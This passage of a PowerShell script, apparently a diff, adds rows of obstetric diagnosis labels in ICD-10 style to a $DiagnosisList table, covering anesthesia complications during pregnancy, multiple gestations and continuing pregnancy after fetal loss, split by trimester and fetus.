pregnancy, first trimester") + $null = $DiagnosisList.Rows.Add("Other pulmonary complications of anesthesia during pregnancy","Other pulmonary complications of anesthesia during pregnancy, second trimester") + $null = $DiagnosisList.Rows.Add("Other pulmonary complications of anesthesia during pregnancy","Other pulmonary complications of anesthesia during pregnancy, third trimester") + $null = $DiagnosisList.Rows.Add("Other pulmonary complications of anesthesia during pregnancy","Other pulmonary complications of anesthesia during pregnancy, unspecified trimester") + $null = $DiagnosisList.Rows.Add("Cardiac arrest due to anesthesia during pregnancy","Cardiac arrest due to anesthesia during pregnancy, first trimester") + $null = $DiagnosisList.Rows.Add("Cardiac arrest due to anesthesia during pregnancy","Cardiac arrest due to anesthesia during pregnancy, second trimester") + $null = $DiagnosisList.Rows.Add("Cardiac arrest due to anesthesia during pregnancy","Cardiac arrest due to anesthesia during pregnancy, third trimester") + $null = $DiagnosisList.Rows.Add("Cardiac arrest due to anesthesia during pregnancy","Cardiac arrest due to anesthesia during pregnancy, unspecified trimester") + $null = $DiagnosisList.Rows.Add("Cardiac failure due to anesthesia during pregnancy","Cardiac failure due to anesthesia during pregnancy, first trimester") + $null = $DiagnosisList.Rows.Add("Cardiac failure due to anesthesia during pregnancy","Cardiac failure due to anesthesia during pregnancy, second trimester") + $null = $DiagnosisList.Rows.Add("Cardiac failure due to anesthesia during pregnancy","Cardiac failure due to anesthesia during pregnancy, third trimester") + $null = $DiagnosisList.Rows.Add("Cardiac failure due to anesthesia during pregnancy","Cardiac failure due to anesthesia during pregnancy, unspecified trimester") + $null = $DiagnosisList.Rows.Add("Other cardiac complications of anesthesia during pregnancy","Other cardiac complications of anesthesia during pregnancy, first trimester") + $null = $DiagnosisList.Rows.Add("Other cardiac complications of anesthesia during pregnancy","Other cardiac complications of anesthesia during pregnancy, second trimester") + $null = $DiagnosisList.Rows.Add("Other cardiac complications of anesthesia during pregnancy","Other cardiac complications of anesthesia during pregnancy, third trimester") + $null = $DiagnosisList.Rows.Add("Other cardiac complications of anesthesia during pregnancy","Other cardiac complications of anesthesia during pregnancy, unspecified trimester") + $null = $DiagnosisList.Rows.Add("Cerebral anoxia due to anesthesia during pregnancy","Cerebral anoxia due to anesthesia during pregnancy, first trimester") + $null = $DiagnosisList.Rows.Add("Cerebral anoxia due to anesthesia during pregnancy","Cerebral anoxia due to anesthesia during pregnancy, second trimester") + $null = $DiagnosisList.Rows.Add("Cerebral anoxia due to anesthesia during pregnancy","Cerebral anoxia due to anesthesia during pregnancy, third trimester") + $null = $DiagnosisList.Rows.Add("Cerebral anoxia due to anesthesia during pregnancy","Cerebral anoxia due to anesthesia during pregnancy, unspecified trimester") + $null = $DiagnosisList.Rows.Add("Other central nervous system complications of anesthesia during pregnancy","Other central nervous system complications of anesthesia during pregnancy, first trimester") + $null = $DiagnosisList.Rows.Add("Other central nervous system complications of anesthesia during pregnancy","Other central nervous system complications of anesthesia during pregnancy, second trimester") + $null = $DiagnosisList.Rows.Add("Other central nervous system complications of anesthesia during pregnancy","Other central nervous system complications of anesthesia during pregnancy, third trimester") + $null = $DiagnosisList.Rows.Add("Other central nervous system complications of anesthesia during pregnancy","Other central nervous system complications of anesthesia during pregnancy, unspecified trimester") + $null = $DiagnosisList.Rows.Add("Toxic reaction to local anesthesia during pregnancy","Toxic reaction to local anesthesia during pregnancy, first trimester") + $null = $DiagnosisList.Rows.Add("Toxic reaction to local anesthesia during pregnancy","Toxic reaction to local anesthesia during pregnancy, second trimester") + $null = $DiagnosisList.Rows.Add("Toxic reaction to local anesthesia during pregnancy","Toxic reaction to local anesthesia during pregnancy, third trimester") + $null = $DiagnosisList.Rows.Add("Toxic reaction to local anesthesia during pregnancy","Toxic reaction to local anesthesia during pregnancy, unspecified trimester") + $null = $DiagnosisList.Rows.Add("Spinal and epidural anesthesia induced headache during pregnancy","Spinal and epidural anesthesia induced headache during pregnancy, unspecified trimester") + $null = $DiagnosisList.Rows.Add("Spinal and epidural anesthesia induced headache during pregnancy","Spinal and epidural anesthesia induced headache during pregnancy, first trimester") + $null = $DiagnosisList.Rows.Add("Spinal and epidural anesthesia induced headache during pregnancy","Spinal and epidural anesthesia induced headache during pregnancy, second trimester") + $null = $DiagnosisList.Rows.Add("Spinal and epidural anesthesia induced headache during pregnancy","Spinal and epidural anesthesia induced headache during pregnancy, third trimester") + $null = $DiagnosisList.Rows.Add("Other complications of spinal and epidural anesthesia during pregnancy","Other complications of spinal and epidural anesthesia during pregnancy, first trimester") + $null = $DiagnosisList.Rows.Add("Other complications of spinal and epidural anesthesia during pregnancy","Other complications of spinal and epidural anesthesia during pregnancy, second trimester") + $null = $DiagnosisList.Rows.Add("Other complications of spinal and epidural anesthesia during pregnancy","Other complications of spinal and epidural anesthesia during pregnancy, third trimester") + $null = $DiagnosisList.Rows.Add("Other complications of spinal and epidural anesthesia during pregnancy","Other complications of spinal and epidural anesthesia during pregnancy, unspecified trimester") + $null = $DiagnosisList.Rows.Add("Failed or difficult intubation for anesthesia during pregnancy","Failed or difficult intubation for anesthesia during pregnancy, unspecified trimester") + $null = $DiagnosisList.Rows.Add("Failed or difficult intubation for anesthesia during pregnancy","Failed or difficult intubation for anesthesia during pregnancy, first trimester") + $null = $DiagnosisList.Rows.Add("Failed or difficult intubation for anesthesia during pregnancy","Failed or difficult intubation for anesthesia during pregnancy, second trimester") + $null = $DiagnosisList.Rows.Add("Failed or difficult intubation for anesthesia during pregnancy","Failed or difficult intubation for anesthesia during pregnancy, third trimester") + $null = $DiagnosisList.Rows.Add("Other complications of anesthesia during pregnancy","Other complications of anesthesia during pregnancy, first trimester") + $null = $DiagnosisList.Rows.Add("Other complications of anesthesia during pregnancy","Other complications of anesthesia during pregnancy, second trimester") + $null = $DiagnosisList.Rows.Add("Other complications of anesthesia during pregnancy","Other complications of anesthesia during pregnancy, third trimester") + $null = $DiagnosisList.Rows.Add("Other complications of anesthesia during pregnancy","Other complications of anesthesia during pregnancy, unspecified trimester") + $null = $DiagnosisList.Rows.Add("Unspecified complication of anesthesia during pregnancy","Unspecified complication of anesthesia during pregnancy, unspecified trimester") + $null = $DiagnosisList.Rows.Add("Unspecified complication of anesthesia during pregnancy","Unspecified complication of anesthesia during pregnancy, first trimester") + $null = $DiagnosisList.Rows.Add("Unspecified complication of anesthesia during pregnancy","Unspecified complication of anesthesia during pregnancy, second trimester") + $null = $DiagnosisList.Rows.Add("Unspecified complication of anesthesia during pregnancy","Unspecified complication of anesthesia during pregnancy, third trimester") + $null = $DiagnosisList.Rows.Add("Twin pregnancy, unspecified number of placenta and unspecified number of amniotic sacs","Twin pregnancy, unspecified number of placenta and unspecified number of amniotic sacs, first trimester") + $null = $DiagnosisList.Rows.Add("Twin pregnancy, unspecified number of placenta and unspecified number of amniotic sacs","Twin pregnancy, unspecified number of placenta and unspecified number of amniotic sacs, second trimester") + $null = $DiagnosisList.Rows.Add("Twin pregnancy, unspecified number of placenta and unspecified number of amniotic sacs","Twin pregnancy, unspecified number of placenta and unspecified number of amniotic sacs, third trimester") + $null = $DiagnosisList.Rows.Add("Twin pregnancy, unspecified number of placenta and unspecified number of amniotic sacs","Twin pregnancy, unspecified number of placenta and unspecified number of amniotic sacs, unspecified trimester") + $null = $DiagnosisList.Rows.Add("Twin pregnancy, monochorionic/monoamniotic","Twin pregnancy, monochorionic/monoamniotic, first trimester") + $null = $DiagnosisList.Rows.Add("Twin pregnancy, monochorionic/monoamniotic","Twin pregnancy, monochorionic/monoamniotic, second trimester") + $null = $DiagnosisList.Rows.Add("Twin pregnancy, monochorionic/monoamniotic","Twin pregnancy, monochorionic/monoamniotic, third trimester") + $null = $DiagnosisList.Rows.Add("Twin pregnancy, monochorionic/monoamniotic","Twin pregnancy, monochorionic/monoamniotic, unspecified trimester") + $null = $DiagnosisList.Rows.Add("Conjoined twin pregnancy","Conjoined twin pregnancy, first trimester") + $null = $DiagnosisList.Rows.Add("Conjoined twin pregnancy","Conjoined twin pregnancy, second trimester") + $null = $DiagnosisList.Rows.Add("Conjoined twin pregnancy","Conjoined twin pregnancy, third trimester") + $null = $DiagnosisList.Rows.Add("Conjoined twin pregnancy","Conjoined twin pregnancy, unspecified trimester") + $null = $DiagnosisList.Rows.Add("Twin pregnancy, monochorionic/diamniotic","Twin pregnancy, monochorionic/diamniotic, first trimester") + $null = $DiagnosisList.Rows.Add("Twin pregnancy, monochorionic/diamniotic","Twin pregnancy, monochorionic/diamniotic, second trimester") + $null = $DiagnosisList.Rows.Add("Twin pregnancy, monochorionic/diamniotic","Twin pregnancy, monochorionic/diamniotic, third trimester") + $null = $DiagnosisList.Rows.Add("Twin pregnancy, monochorionic/diamniotic","Twin pregnancy, monochorionic/diamniotic, unspecified trimester") + $null = $DiagnosisList.Rows.Add("Twin pregnancy, dichorionic/diamniotic","Twin pregnancy, dichorionic/diamniotic, first trimester") + $null = $DiagnosisList.Rows.Add("Twin pregnancy, dichorionic/diamniotic","Twin pregnancy, dichorionic/diamniotic, second trimester") + $null = $DiagnosisList.Rows.Add("Twin pregnancy, dichorionic/diamniotic","Twin pregnancy, dichorionic/diamniotic, third trimester") + $null = $DiagnosisList.Rows.Add("Twin pregnancy, dichorionic/diamniotic","Twin pregnancy, dichorionic/diamniotic, unspecified trimester") + $null = $DiagnosisList.Rows.Add("Twin pregnancy, unable to determine number of placenta and number of amniotic sacs","Twin pregnancy, unable to determine number of placenta and number of amniotic sacs, first trimester") + $null = $DiagnosisList.Rows.Add("Twin pregnancy, unable to determine number of placenta and number of amniotic sacs","Twin pregnancy, unable to determine number of placenta and number of amniotic sacs, second trimester") + $null = $DiagnosisList.Rows.Add("Twin pregnancy, unable to determine number of placenta and number of amniotic sacs","Twin pregnancy, unable to determine number of placenta and number of amniotic sacs, third trimester") + $null = $DiagnosisList.Rows.Add("Twin pregnancy, unable to determine number of placenta and number of amniotic sacs","Twin pregnancy, unable to determine number of placenta and number of amniotic sacs, unspecified trimester") + $null = $DiagnosisList.Rows.Add("Triplet pregnancy, unspecified number of placenta and unspecified number of amniotic sacs","Triplet pregnancy, unspecified number of placenta and unspecified number of amniotic sacs, first trimester") + $null = $DiagnosisList.Rows.Add("Triplet pregnancy, unspecified number of placenta and unspecified number of amniotic sacs","Triplet pregnancy, unspecified number of placenta and unspecified number of amniotic sacs, second trimester") + $null = $DiagnosisList.Rows.Add("Triplet pregnancy, unspecified number of placenta and unspecified number of amniotic sacs","Triplet pregnancy, unspecified number of placenta and unspecified number of amniotic sacs, third trimester") + $null = $DiagnosisList.Rows.Add("Triplet pregnancy, unspecified number of placenta and unspecified number of amniotic sacs","Triplet pregnancy, unspecified number of placenta and unspecified number of amniotic sacs, unspecified trimester") + $null = $DiagnosisList.Rows.Add("Triplet pregnancy with two or more monochorionic fetuses","Triplet pregnancy with two or more monochorionic fetuses, first trimester") + $null = $DiagnosisList.Rows.Add("Triplet pregnancy with two or more monochorionic fetuses","Triplet pregnancy with two or more monochorionic fetuses, second trimester") + $null = $DiagnosisList.Rows.Add("Triplet pregnancy with two or more monochorionic fetuses","Triplet pregnancy with two or more monochorionic fetuses, third trimester") + $null = $DiagnosisList.Rows.Add("Triplet pregnancy with two or more monochorionic fetuses","Triplet pregnancy with two or more monochorionic fetuses, unspecified trimester") + $null = $DiagnosisList.Rows.Add("Triplet pregnancy with two or more monoamniotic fetuses","Triplet pregnancy with two or more monoamniotic fetuses, first trimester") + $null = $DiagnosisList.Rows.Add("Triplet pregnancy with two or more monoamniotic fetuses","Triplet pregnancy with two or more monoamniotic fetuses, second trimester") + $null = $DiagnosisList.Rows.Add("Triplet pregnancy with two or more monoamniotic fetuses","Triplet pregnancy with two or more monoamniotic fetuses, third trimester") + $null = $DiagnosisList.Rows.Add("Triplet pregnancy with two or more monoamniotic fetuses","Triplet pregnancy with two or more monoamniotic fetuses, unspecified trimester") + $null = $DiagnosisList.Rows.Add("Triplet pregnancy, unable to determine number of placenta and number of amniotic sacs","Triplet pregnancy, unable to determine number of placenta and number of amniotic sacs, first trimester") + $null = $DiagnosisList.Rows.Add("Triplet pregnancy, unable to determine number of placenta and number of amniotic sacs","Triplet pregnancy, unable to determine number of placenta and number of amniotic sacs, second trimester") + $null = $DiagnosisList.Rows.Add("Triplet pregnancy, unable to determine number of placenta and number of amniotic sacs","Triplet pregnancy, unable to determine number of placenta and number of amniotic sacs, third trimester") + $null = $DiagnosisList.Rows.Add("Triplet pregnancy, unable to determine number of placenta and number of amniotic sacs","Triplet pregnancy, unable to determine number of placenta and number of amniotic sacs, unspecified trimester") + $null = $DiagnosisList.Rows.Add("Quadruplet pregnancy, unspecified number of placenta and unspecified number of amniotic sacs","Quadruplet pregnancy, unspecified number of placenta and unspecified number of amniotic sacs, first trimester") + $null = $DiagnosisList.Rows.Add("Quadruplet pregnancy, unspecified number of placenta and unspecified number of amniotic sacs","Quadruplet pregnancy, unspecified number of placenta and unspecified number of amniotic sacs, second trimester") + $null = $DiagnosisList.Rows.Add("Quadruplet pregnancy, unspecified number of placenta and unspecified number of amniotic sacs","Quadruplet pregnancy, unspecified number of placenta and unspecified number of amniotic sacs, third trimester") + $null = $DiagnosisList.Rows.Add("Quadruplet pregnancy, unspecified number of placenta and unspecified number of amniotic sacs","Quadruplet pregnancy, unspecified number of placenta and unspecified number of amniotic sacs, unspecified trimester") + $null = $DiagnosisList.Rows.Add("Quadruplet pregnancy with two or more monochorionic fetuses","Quadruplet pregnancy with two or more monochorionic fetuses, first trimester") + $null = $DiagnosisList.Rows.Add("Quadruplet pregnancy with two or more monochorionic fetuses","Quadruplet pregnancy with two or more monochorionic fetuses, second trimester") + $null = $DiagnosisList.Rows.Add("Quadruplet pregnancy with two or more monochorionic fetuses","Quadruplet pregnancy with two or more monochorionic fetuses, third trimester") + $null = $DiagnosisList.Rows.Add("Quadruplet pregnancy with two or more monochorionic fetuses","Quadruplet pregnancy with two or more monochorionic fetuses, unspecified trimester") + $null = $DiagnosisList.Rows.Add("Quadruplet pregnancy with two or more monoamniotic fetuses","Quadruplet pregnancy with two or more monoamniotic fetuses, first trimester") + $null = $DiagnosisList.Rows.Add("Quadruplet pregnancy with two or more monoamniotic fetuses","Quadruplet pregnancy with two or more monoamniotic fetuses, second trimester") + $null = $DiagnosisList.Rows.Add("Quadruplet pregnancy with two or more monoamniotic fetuses","Quadruplet pregnancy with two or more monoamniotic fetuses, third trimester") + $null = $DiagnosisList.Rows.Add("Quadruplet pregnancy with two or more monoamniotic fetuses","Quadruplet pregnancy with two or more monoamniotic fetuses, unspecified trimester") + $null = $DiagnosisList.Rows.Add("Quadruplet pregnancy, unable to determine number of placenta and number of amniotic sacs","Quadruplet pregnancy, unable to determine number of placenta and number of amniotic sacs, first trimester") + $null = $DiagnosisList.Rows.Add("Quadruplet pregnancy, unable to determine number of placenta and number of amniotic sacs","Quadruplet pregnancy, unable to determine number of placenta and number of amniotic sacs, second trimester") + $null = $DiagnosisList.Rows.Add("Quadruplet pregnancy, unable to determine number of placenta and number of amniotic sacs","Quadruplet pregnancy, unable to determine number of placenta and number of amniotic sacs, third trimester") + $null = $DiagnosisList.Rows.Add("Quadruplet pregnancy, unable to determine number of placenta and number of amniotic sacs","Quadruplet pregnancy, unable to determine number of placenta and number of amniotic sacs, unspecified trimester") + $null = $DiagnosisList.Rows.Add("Other specified multiple gestation, unspecified number of placenta and unspecified number of amniotic sacs","Other specified multiple gestation, unspecified number of placenta and unspecified number of amniotic sacs, first trimester") + $null = $DiagnosisList.Rows.Add("Other specified multiple gestation, unspecified number of placenta and unspecified number of amniotic sacs","Other specified multiple gestation, unspecified number of placenta and unspecified number of amniotic sacs, second trimester") + $null = $DiagnosisList.Rows.Add("Other specified multiple gestation, unspecified number of placenta and unspecified number of amniotic sacs","Other specified multiple gestation, unspecified number of placenta and unspecified number of amniotic sacs, third trimester") + $null = $DiagnosisList.Rows.Add("Other specified multiple gestation, unspecified number of placenta and unspecified number of amniotic sacs","Other specified multiple gestation, unspecified number of placenta and unspecified number of amniotic sacs, unspecified trimester") + $null = $DiagnosisList.Rows.Add("Other specified multiple gestation with two or more monochorionic fetuses","Other specified multiple gestation with two or more monochorionic fetuses, first trimester") + $null = $DiagnosisList.Rows.Add("Other specified multiple gestation with two or more monochorionic fetuses","Other specified multiple gestation with two or more monochorionic fetuses, second trimester") + $null = $DiagnosisList.Rows.Add("Other specified multiple gestation with two or more monochorionic fetuses","Other specified multiple gestation with two or more monochorionic fetuses, third trimester") + $null = $DiagnosisList.Rows.Add("Other specified multiple gestation with two or more monochorionic fetuses","Other specified multiple gestation with two or more monochorionic fetuses, unspecified trimester") + $null = $DiagnosisList.Rows.Add("Other specified multiple gestation with two or more monoamniotic fetuses","Other specified multiple gestation with two or more monoamniotic fetuses, first trimester") + $null = $DiagnosisList.Rows.Add("Other specified multiple gestation with two or more monoamniotic fetuses","Other specified multiple gestation with two or more monoamniotic fetuses, second trimester") + $null = $DiagnosisList.Rows.Add("Other specified multiple gestation with two or more monoamniotic fetuses","Other specified multiple gestation with two or more monoamniotic fetuses, third trimester") + $null = $DiagnosisList.Rows.Add("Other specified multiple gestation with two or more monoamniotic fetuses","Other specified multiple gestation with two or more monoamniotic fetuses, unspecified trimester") + $null = $DiagnosisList.Rows.Add("Other specified multiple gestation, unable to determine number of placenta and number of amniotic sacs","Other specified multiple gestation, unable to determine number of placenta and number of amniotic sacs, first trimester") + $null = $DiagnosisList.Rows.Add("Other specified multiple gestation, unable to determine number of placenta and number of amniotic sacs","Other specified multiple gestation, unable to determine number of placenta and number of amniotic sacs, second trimester") + $null = $DiagnosisList.Rows.Add("Other specified multiple gestation, unable to determine number of placenta and number of amniotic sacs","Other specified multiple gestation, unable to determine number of placenta and number of amniotic sacs, third trimester") + $null = $DiagnosisList.Rows.Add("Other specified multiple gestation, unable to determine number of placenta and number of amniotic sacs","Other specified multiple gestation, unable to determine number of placenta and number of amniotic sacs, unspecified trimester") + $null = $DiagnosisList.Rows.Add("Multiple gestation, unspecified","Multiple gestation, unspecified, unspecified trimester") + $null = $DiagnosisList.Rows.Add("Multiple gestation, unspecified","Multiple gestation, unspecified, first trimester") + $null = $DiagnosisList.Rows.Add("Multiple gestation, unspecified","Multiple gestation, unspecified, second trimester") + $null = $DiagnosisList.Rows.Add("Multiple gestation, unspecified","Multiple gestation, unspecified, third trimester") + $null = $DiagnosisList.Rows.Add("Papyraceous fetus, unspecified trimester","Papyraceous fetus, unspecified trimester, not applicable or unspecified") + $null = $DiagnosisList.Rows.Add("Papyraceous fetus, unspecified trimester","Papyraceous fetus, unspecified trimester, fetus 1") + $null = $DiagnosisList.Rows.Add("Papyraceous fetus, unspecified trimester","Papyraceous fetus, unspecified trimester, fetus 2") + $null = $DiagnosisList.Rows.Add("Papyraceous fetus, unspecified trimester","Papyraceous fetus, unspecified trimester, fetus 3") + $null = $DiagnosisList.Rows.Add("Papyraceous fetus, unspecified trimester","Papyraceous fetus, unspecified trimester, fetus 4") + $null = $DiagnosisList.Rows.Add("Papyraceous fetus, unspecified trimester","Papyraceous fetus, unspecified trimester, fetus 5") + $null = $DiagnosisList.Rows.Add("Papyraceous fetus, unspecified trimester","Papyraceous fetus, unspecified trimester, other fetus") + $null = $DiagnosisList.Rows.Add("Papyraceous fetus, first trimester","Papyraceous fetus, first trimester, not applicable or unspecified") + $null = $DiagnosisList.Rows.Add("Papyraceous fetus, first trimester","Papyraceous fetus, first trimester, fetus 1") + $null = $DiagnosisList.Rows.Add("Papyraceous fetus, first trimester","Papyraceous fetus, first trimester, fetus 2") + $null = $DiagnosisList.Rows.Add("Papyraceous fetus, first trimester","Papyraceous fetus, first trimester, fetus 3") + $null = $DiagnosisList.Rows.Add("Papyraceous fetus, first trimester","Papyraceous fetus, first trimester, fetus 4") + $null = $DiagnosisList.Rows.Add("Papyraceous fetus, first trimester","Papyraceous fetus, first trimester, fetus 5") + $null = $DiagnosisList.Rows.Add("Papyraceous fetus, first trimester","Papyraceous fetus, first trimester, other fetus") + $null = $DiagnosisList.Rows.Add("Papyraceous fetus, second trimester","Papyraceous fetus, second trimester, not applicable or unspecified") + $null = $DiagnosisList.Rows.Add("Papyraceous fetus, second trimester","Papyraceous fetus, second trimester, fetus 1") + $null = $DiagnosisList.Rows.Add("Papyraceous fetus, second trimester","Papyraceous fetus, second trimester, fetus 2") + $null = $DiagnosisList.Rows.Add("Papyraceous fetus, second trimester","Papyraceous fetus, second trimester, fetus 3") + $null = $DiagnosisList.Rows.Add("Papyraceous fetus, second trimester","Papyraceous fetus, second trimester, fetus 4") + $null = $DiagnosisList.Rows.Add("Papyraceous fetus, second trimester","Papyraceous fetus, second trimester, fetus 5") + $null = $DiagnosisList.Rows.Add("Papyraceous fetus, second trimester","Papyraceous fetus, second trimester, other fetus") + $null = $DiagnosisList.Rows.Add("Papyraceous fetus, third trimester","Papyraceous fetus, third trimester, not applicable or unspecified") + $null = $DiagnosisList.Rows.Add("Papyraceous fetus, third trimester","Papyraceous fetus, third trimester, fetus 1") + $null = $DiagnosisList.Rows.Add("Papyraceous fetus, third trimester","Papyraceous fetus, third trimester, fetus 2") + $null = $DiagnosisList.Rows.Add("Papyraceous fetus, third trimester","Papyraceous fetus, third trimester, fetus 3") + $null = $DiagnosisList.Rows.Add("Papyraceous fetus, third trimester","Papyraceous fetus, third trimester, fetus 4") + $null = $DiagnosisList.Rows.Add("Papyraceous fetus, third trimester","Papyraceous fetus, third trimester, fetus 5") + $null = $DiagnosisList.Rows.Add("Papyraceous fetus, third trimester","Papyraceous fetus, third trimester, other fetus") + $null = $DiagnosisList.Rows.Add("Continuing pregnancy after spontaneous abortion of one fetus or more, unspecified trimester","Continuing pregnancy after spontaneous abortion of one fetus or more, unspecified trimester, not applicable or unspecified") + $null = $DiagnosisList.Rows.Add("Continuing pregnancy after spontaneous abortion of one fetus or more, unspecified trimester","Continuing pregnancy after spontaneous abortion of one fetus or more, unspecified trimester, fetus 1") + $null = $DiagnosisList.Rows.Add("Continuing pregnancy after spontaneous abortion of one fetus or more, unspecified trimester","Continuing pregnancy after spontaneous abortion of one fetus or more, unspecified trimester, fetus 2") + $null = $DiagnosisList.Rows.Add("Continuing pregnancy after spontaneous abortion of one fetus or more, unspecified trimester","Continuing pregnancy after spontaneous abortion of one fetus or more, unspecified trimester, fetus 3") + $null = $DiagnosisList.Rows.Add("Continuing pregnancy after spontaneous abortion of one fetus or more, unspecified trimester","Continuing pregnancy after spontaneous abortion of one fetus or more, unspecified trimester, fetus 4") + $null = $DiagnosisList.Rows.Add("Continuing pregnancy after spontaneous abortion of one fetus or more, unspecified trimester","Continuing pregnancy after spontaneous abortion of one fetus or more, unspecified trimester, fetus 5") + $null = $DiagnosisList.Rows.Add("Continuing pregnancy after spontaneous abortion of one fetus or more, unspecified trimester","Continuing pregnancy after spontaneous abortion of one fetus or more, unspecified trimester, other fetus") + $null = $DiagnosisList.Rows.Add("Continuing pregnancy after spontaneous abortion of one fetus or more, first trimester","Continuing pregnancy after spontaneous abortion of one fetus or more, first trimester, not applicable or unspecified") + $null = $DiagnosisList.Rows.Add("Continuing pregnancy after spontaneous abortion of one fetus or more, first trimester","Continuing pregnancy after spontaneous abortion of one fetus or more, first trimester, fetus 1") + $null = $DiagnosisList.Rows.Add("Continuing pregnancy after spontaneous abortion of one fetus or more, first trimester","Continuing pregnancy after spontaneous abortion of one fetus or more, first trimester, fetus 2") + $null = $DiagnosisList.Rows.Add("Continuing pregnancy after spontaneous abortion of one fetus or more, first trimester","Continuing pregnancy after spontaneous abortion of one fetus or more, first trimester, fetus 3") + $null = $DiagnosisList.Rows.Add("Continuing pregnancy after spontaneous abortion of one fetus or more, first trimester","Continuing pregnancy after spontaneous abortion of one fetus or more, first trimester, fetus 4") + $null = $DiagnosisList.Rows.Add("Continuing pregnancy after spontaneous abortion of one fetus or more, first trimester","Continuing pregnancy after spontaneous abortion of one fetus or more, first trimester, fetus 5") + $null = $DiagnosisList.Rows.Add("Continuing pregnancy after spontaneous abortion of one fetus or more, first trimester","Continuing pregnancy after spontaneous abortion of one fetus or more, first trimester, other fetus") + $null = $DiagnosisList.Rows.Add("Continuing pregnancy after spontaneous abortion of one fetus or more, second trimester","Continuing pregnancy after spontaneous abortion of one fetus or more, second trimester, not applicable or unspecified") + $null = $DiagnosisList.Rows.Add("Continuing pregnancy after spontaneous abortion of one fetus or more, second trimester","Continuing pregnancy after spontaneous abortion of one fetus or more, second trimester, fetus 1") + $null = $DiagnosisList.Rows.Add("Continuing pregnancy after spontaneous abortion of one fetus or more, second trimester","Continuing pregnancy after spontaneous abortion of one fetus or more, second trimester, fetus 2") + $null = $DiagnosisList.Rows.Add("Continuing pregnancy after spontaneous abortion of one fetus or more, second trimester","Continuing pregnancy after spontaneous abortion of one fetus or more, second trimester, fetus 3") + $null = $DiagnosisList.Rows.Add("Continuing pregnancy after spontaneous abortion of one fetus or more, second trimester","Continuing pregnancy after spontaneous abortion of one fetus or more, second trimester, fetus 4") + $null = $DiagnosisList.Rows.Add("Continuing pregnancy after spontaneous abortion of one fetus or more, second trimester","Continuing pregnancy after spontaneous abortion of one fetus or more, second trimester, fetus 5") + $null = $DiagnosisList.Rows.Add("Continuing pregnancy after spontaneous abortion of one fetus or more, second trimester","Continuing pregnancy after spontaneous abortion of one fetus or more, second trimester, other fetus") + $null = $DiagnosisList.Rows.Add("Continuing pregnancy after spontaneous abortion of one fetus or more, third trimester","Continuing pregnancy after spontaneous abortion of one fetus or more, third trimester, not applicable or unspecified") + $null = $DiagnosisList.Rows.Add("Continuing pregnancy after spontaneous abortion of one fetus or more, third trimester","Continuing pregnancy after spontaneous abortion of one fetus or more, third trimester, fetus 1") + $null = $DiagnosisList.Rows.Add("Continuing pregnancy after spontaneous abortion of one fetus or more, third trimester","Continuing pregnancy after spontaneous abortion of one fetus or more, third trimester, fetus 2") + $null = $DiagnosisList.Rows.Add("Continuing pregnancy after spontaneous abortion of one fetus or more, third trimester","Continuing pregnancy after spontaneous abortion of one fetus or more, third trimester, fetus 3") + $null = $DiagnosisList.Rows.Add("Continuing pregnancy after spontaneous abortion of one fetus or more, third trimester","Continuing pregnancy after spontaneous abortion of one fetus or more, third trimester, fetus 4") + $null = $DiagnosisList.Rows.Add("Continuing pregnancy after spontaneous abortion of one fetus or more, third trimester","Continuing pregnancy after spontaneous abortion of one fetus or more, third trimester, fetus 5") + $null = $DiagnosisList.Rows.Add("Continuing pregnancy after spontaneous abortion of one fetus or more, third trimester","Continuing pregnancy after spontaneous abortion of one fetus or more, third trimester, other fetus") + $null = $DiagnosisList.Rows.Add("Continuing pregnancy after intrauterine death of one fetus or more, unspecified trimester","Continuing pregnancy after intrauterine death of one fetus or more, unspecified trimester, not applicable or unspecified") + $null = $DiagnosisList.Rows.Add("Continuing pregnancy after intrauterine death of one fetus or more, unspecified trimester","Continuing pregnancy after intrauterine death of one fetus or more, unspecified trimester, fetus 1") + $null = $DiagnosisList.Rows.Add("Continuing pregnancy after intrauterine death of one fetus or more, unspecified trimester","Continuing pregnancy after intrauterine death of one fetus or more, unspecified trimester, fetus 2") + $null = $DiagnosisList.Rows.Add("Continuing pregnancy after intrauterine death of one fetus or more, unspecified trimester","Continuing pregnancy after intrauterine death of one fetus or more, unspecified trimester, fetus 3") + $null = $DiagnosisList.Rows.Add("Continuing pregnancy after intrauterine death of one fetus or more, unspecified trimester","Continuing pregnancy after intrauterine death of one fetus or more, unspecified trimester, fetus 4") + $null = $DiagnosisList.Rows.Add("Continuing pregnancy after intrauterine death of one fetus or more, unspecified trimester","Continuing pregnancy after intrauterine death of one fetus or more, unspecified trimester, fetus 5") + $null = $DiagnosisList.Rows.Add("Continuing pregnancy after intrauterine death of one fetus or more, unspecified trimester","Continuing pregnancy after intrauterine death of one fetus or more, unspecified trimester, other fetus") + $null = $DiagnosisList.Rows.Add("Continuing pregnancy after intrauterine death of one fetus or more, first trimester","Continuing pregnancy after intrauterine death of one fetus or more, first trimester, not applicable or unspecified") + $null = $DiagnosisList.Rows.Add("Continuing pregnancy after intrauterine death of one fetus or more, first trimester","Continuing pregnancy after intrauterine death of one fetus or more, first trimester, fetus 1") + $null = $DiagnosisList.Rows.Add("Continuing pregnancy after intrauterine death of one fetus or more, first trimester","Continuing pregnancy after intrauterine death of one fetus or more, first trimester, fetus 2") + $null = $DiagnosisList.Rows.Add("Continuing pregnancy after intrauterine death of one fetus or more, first trimester","Continuing pregnancy after intrauterine death of one fetus or more, first trimester, fetus 3") + $null = $DiagnosisList.Rows.Add("Continuing pregnancy after intrauterine death of one fetus or more, first trimester","Continuing pregnancy after intrauterine death of one fetus or more, first trimester, fetus 4") + $null = $DiagnosisList.Rows.Add("Continuing pregnancy after intrauterine death of one fetus or more, first trimester","Continuing pregnancy after intrauterine death of one fetus or more, first trimester, fetus 5") + $null = $DiagnosisList.Rows.Add("Continuing pregnancy after intrauterine death of one fetus or more, first trimester","Continuing pregnancy after intrauterine death of one fetus or more, first trimester, other fetus") + $null = $DiagnosisList.Rows.Add("Continuing pregnancy after intrauterine death of one fetus or more, second trimester","Continuing pregnancy after intrauterine death of one fetus or more, second trimester, not applicable or unspecified") + $null = $DiagnosisList.Rows.Add("Continuing pregnancy after intrauterine death of one fetus or more, second trimester","Continuing pregnancy after intrauterine death of one fetus or more, second trimester, fetus 1") + $null = $DiagnosisList.Rows.Add("Continuing pregnancy after intrauterine death of one fetus or more, second trimester","Continuing pregnancy after intrauterine death of one fetus or more, second trimester, fetus 2") + $null = $DiagnosisList.Rows.Add("Continuing pregnancy after intrauterine death of one fetus or more, second trimester","Continuing pregnancy after intrauterine death of one fetus or more, second trimester, fetus 3") + $null = $DiagnosisList.Rows.Add("Continuing pregnancy after intrauterine death of one fetus or more, second trimester","Continuing pregnancy after intrauterine death of one fetus or 